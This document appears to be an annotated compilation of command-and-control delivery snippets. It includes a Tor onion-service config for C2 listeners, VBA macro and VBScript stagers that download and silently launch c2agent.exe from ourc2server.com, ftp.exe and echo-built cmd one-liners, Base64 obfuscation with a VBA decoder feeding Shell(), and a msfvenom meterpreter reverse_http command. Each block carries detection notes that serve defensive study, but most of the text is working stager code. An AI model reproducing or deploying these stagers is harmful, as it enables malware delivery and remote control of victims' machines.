# Tor configuration excerpt that publishes three local listeners as one onion service.
# Each HiddenServicePort line maps a virtual onion port to a loopback address, so the
# listeners themselves are bound to 127.0.0.1 only.
# Defender note: an implant using this channel is seen on the victim network as
# Tor client traffic, not as a connection to a fixed C2 address; egress policy and
# Tor-usage detection are the relevant controls.
# hidden service directory
HiddenServiceeDir /home/wil/tor_hidden
# C2 web port (onion port 443 -> local 4433)
HiddenServicePort 443 127.0.0.1:4433
# C2 SSH port
HiddenServicePort 7022 127.0.0.1:7022
# Metasploit C2 listener
HiddenServicePort 8080 127.0.0.1:8080
---

Sub powershell()
'
' Powershell Macro
'
' Office macro stager as printed on the page: it passes a PowerShell command line to
' VBA's Shell() with vbHide, so no console window is shown. The command is meant to
' fetch c2agent.exe over plain HTTP with WebClient.DownloadFile, save it as agent.exe
' (relative path) and start it.
'
' Detection and mitigation points:
'   - process lineage: the document host application spawning powershell.exe
'     (process-creation auditing with command lines; the ASR rule that blocks
'     Office applications from creating child processes stops this outright)
'   - the command line contains "Net.WebClient", "DownloadFile" and "Start-Process"
'     in clear text, and PowerShell script block logging records it
'   - the download is unencrypted HTTP, so the URL and the PE body are visible to a
'     web proxy or network sensor
'   - a new executable is written by powershell.exe and then run from the same folder
Dim PSResponse As String
PSResponse = Shell("PowerShell (New-Object System.Net.WebClient).DownloadFile('http://ourc2server.com/download/c2agent.exe','agent.exe'");Start-Process 'agent.exe'", vbHide)
End Sub
---

REM One-line cmd.exe stager that uses the built-in ftp.exe client instead of PowerShell.
REM It echoes four FTP commands (open, binary, get, quit) into script.txt, runs
REM ftp.exe with -s:script.txt (read commands from file), -v (suppress server
REM responses) and -A (anonymous login), then starts the downloaded c2agent.exe.
REM Detection points: cmd.exe command line with chained "@echo ... >>script.txt",
REM ftp.exe launched with -s:, outbound FTP from a workstation, and script.txt plus
REM c2agent.exe appearing in the working directory. Blocking outbound FTP at the
REM perimeter removes the transport.
cmd.exe /c "@echo open ourc2server.com>script.txt&@echo binary>>script.txt&@echo get /c2agent.exe>>script.txt&@echo quit>>script.txt&@ftp -s:script.txt -v -A&@start c2agent.exe"
---
' VBScript download-and-execute stager built only from COM objects shipped with Windows.
' Flow: synchronous HTTP GET via MSXML2.XMLHTTP -> body written to disk through a
' binary ADODB.Stream -> file launched with WScript.Shell.Exec.
' Detection points: a script host (wscript.exe/cscript.exe) making an outbound HTTP
' request, the MSXML2.XMLHTTP + ADODB.Stream + WScript.Shell combination in one
' script, and a script host writing and then launching an .exe. AMSI-aware endpoint
' products see the script content at run time.
strFileURL = "http://ourc2server/downloads/c2agent.exe"
' relative path: the file lands in the script host's current directory
strHDLocation = "agent.exe"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
' third argument false = synchronous request; send() blocks until the response arrives
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
' the body is only written when the server answers 200
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
' Type 1 = binary stream, so the response bytes are stored unmodified
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
' rewind before saving so the whole buffer is written out
objADOStream.Position = 0
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
' Exec runs regardless of the status check above: the launch is outside the If block
Set objShell = CreateObject("WScript.Shell")
objShell.Exec("agent.exe")
---

REM The same VBScript downloader delivered as a single cmd.exe command: every
REM "@echo ... >>poc.vbs" appends one script line to poc.vbs, and the final
REM "cscript.exe poc.vbs" runs the assembled file. The page prints the one command
REM wrapped over several lines.
REM Detection points: a very long cmd.exe command line with repeated "@echo" and
REM ">>" redirections into a .vbs file, creation of poc.vbs immediately followed by
REM cscript.exe executing it, then the network and file-write behaviour of the
REM script itself (HTTP GET, agent.exe written and launched).
cmd.exe /c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>poc.vbs
&@echo objXMLHTTP.open "GET","http://ourc2server/downloads/c2agent.exe",false>>poc.vbs
&@echo objXMLHTTP.send()>>poc.vbs
&@echo If objXMLHTTP.Status=200 Then>>poc.vbs
&@echo Set objADOStream=CreateObject("ADODB.Stream")>>poc.vbs
&@echo objADOStream.Open>>poc.vbs
&@echo objADOStream.Type=1 >>poc.vbs
&@echo objADOStream.Write objXMLHTTP.ResponseBody>>poc.vbs
&@echo objADOStream.Position=0 >>poc.vbs
&@echo objADOStream.SaveToFile "agent.exe">>poc.vbs
&@echo objADOStream.Close>>poc.vbs
&@echo Set objADOStream=Nothing>>poc.vbs
&@echo End if>>poc.vbs
&@echo Set objXMLHTTP=Nothing>>poc.vbs
&@echo Set objShell=CreateObject("WScript.Shell")>>poc.vbs
&@echo objShell.Exec("agent.exe")>>poc.vbs&cscript.exe poc.vbs"
---

# Console transcript: the command string is converted to UTF-8 bytes and then to a
# Base64 string. Base64 is an encoding, not encryption; its only effect is that the
# keywords and the URL no longer appear as plain text wherever the string is embedded.
# Triage note: long Base64 literals in macros or scripts should be decoded and the
# result inspected; the behaviour after decoding is unchanged.
PS > $b = [System.Text.Encoding]::UTF8.GetBytes("PowerShell (New-Object System.Net.WebClient).DownloadFile('http://ourc2server.com/download/c2agent.exe','agent.exe');Start-Process 'agent.exe'")
PS > [System.Convert]::ToBase64String($b)
---

Option Explicit

' Bit masks for the four 6-bit groups of a 24-bit value
' (&HFC0000, &H3F000, &HFC0, &H3F). None of these four is referenced by the
' decoder shown in this listing.
Private Const clOneMask = 16515072
Private Const clTwoMask = 258048
Private Const clThreeMask = 4032
Private Const clFourMask = 63
' Bit masks for the three bytes of a 24-bit value (&HFF0000, &HFF00, &HFF).
Private Const clHighMask = 16711680
Private Const clMidMask = 65280
Private Const clLowMask = 255

' Powers of two used as multipliers/divisors in place of bit shifts.
Private Const cl2Exp18 = 262144
Private Const cl2Exp12 = 4096
Private Const cl2Exp6 = 64
Private Const cl2Exp8 = 256
Private Const cl2Exp16 = 65536

' Base64 decoder under a non-descriptive name: takes a Base64 string and returns the
' decoded bytes as a VBA string. In this listing it is used to rebuild a command line
' at run time so the command does not appear literally in the macro source.
' Analyst note: a table-driven decoder like this next to a Shell() call is itself a
' useful static indicator; decoding the literal by hand reveals the real command.
Public Function monkey(sString As String) As String

    ' Work buffers: input/output byte arrays, the character-to-sextet table and three
    ' pre-multiplied lookup tables (value * 2^6, * 2^12, * 2^18).
    Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, 
    lPowers12(63) As Long
    Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, 
    sOut As String
    Dim lTemp As Long

    ' Strip line breaks so wrapped Base64 text decodes as one stream.
    sString = Replace(sString, vbCr, vbNullString)
    sString = Replace(sString, vbLf, vbNullString)

    ' The remainder is computed but never checked; lTemp is overwritten by the loops
    ' below, so input whose length is not a multiple of 4 is not rejected here.
    lTemp = Len(sString) Mod 4

    ' Padding count: 2 if "==" occurs anywhere in the string, else 1 if "=" occurs.
    If InStrRev(sString, "==") Then
        iPad = 2
    ElseIf InStrRev(sString, "=") Then
        iPad = 1
    End If

    ' Build the translation table from character code to 6-bit value:
    ' A-Z -> 0..25, a-z -> 26..51, 0-9 -> 52..61, "+" -> 62, "/" -> 63.
    ' Every other code (including "=") keeps the array default of 0.
    For lTemp = 0 To 255
        Select Case lTemp
            Case 65 To 90
                bTrans(lTemp) = lTemp - 65
            Case 97 To 122
                bTrans(lTemp) = lTemp - 71
            Case 48 To 57
                bTrans(lTemp) = lTemp + 4
            Case 43
                bTrans(lTemp) = 62
            Case 47
                bTrans(lTemp) = 63
        End Select
    Next lTemp

    ' Precompute each sextet value multiplied by 2^6, 2^12 and 2^18.
    For lTemp = 0 To 63
        lPowers6(lTemp) = lTemp * cl2Exp6
        lPowers12(lTemp) = lTemp * cl2Exp12
        lPowers18(lTemp) = lTemp * cl2Exp18
    Next lTemp
    ' Convert the string to a single-byte array and size the output at 3 bytes per
    ' 4 input characters.
    bIn = StrConv(sString, vbFromUnicode)
    ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)

    ' Each pass combines four sextets into one 24-bit value and splits it into three
    ' output bytes. The loop indexes lChar + 3 without a bounds check.
    For lChar = 0 To UBound(bIn) Step 4
        lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
                lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3))
        lTemp = lQuad And clHighMask
        bOut(lPos) = lTemp \ cl2Exp16
        lTemp = lQuad And clMidMask
        bOut(lPos + 1) = lTemp \ cl2Exp8
        bOut(lPos + 2) = lQuad And clLowMask
        lPos = lPos + 3
    Next lChar

    ' Back to a VBA string, dropping the bytes that came from "=" padding.
    sOut = StrConv(bOut, vbUnicode)
    If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)
    monkey = sOut

End Function

Sub testb64()
'
' testb64 Macro
'
' Variant of the macro stager in which the command line is stored as a Base64 literal
' and decoded by monkey() immediately before being handed to Shell() with vbHide.
' The literal decodes to the PowerShell download-and-run command shown in the
' encoding step on this page.
'
' Detection points: string matching on the macro source for "PowerShell" or the URL
' no longer hits, but everything after decoding is unchanged: the host application
' still spawns powershell.exe with the full clear-text command line, which
' process-creation auditing and script block logging record. A long Base64 literal
' passed through a decoder into Shell() is a static indicator in its own right.
Dim PSResp As String
PSResp = Shell(monkey("UG93ZXJTaGVsbCAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vb3VyYzJzZXJ2ZXIuY29tL2Rvd25sb2FkL2MyYWdlbnQuZXhlJywnYWdlbnQuZXhlJyk7U3RhcnQtUHJvY2VzcyAnYWdlbnQuZXhlJw=="), vbHide)
End Sub
---

# Payload generation command as printed: architecture x64, platform Windows,
# payload windows/x64/meterpreter_reverse_http, encoder x86/fnstenv_mov applied
# for 5 iterations (-i 5), raw output format, calling back to LHOST on LPORT.
# Defender note: the resulting agent initiates outbound HTTP to the configured host
# and port, so proxy logs, egress filtering to non-standard ports and beaconing
# analysis apply regardless of how the payload bytes are encoded on disk.
msfvenom -a x64 --platform Windows -p windows/x64/meterpreter_reverse_http -e x86/fnstenv_mov -i 5 -f raw LPORT=1234 LHOST=ourc2server.com

---

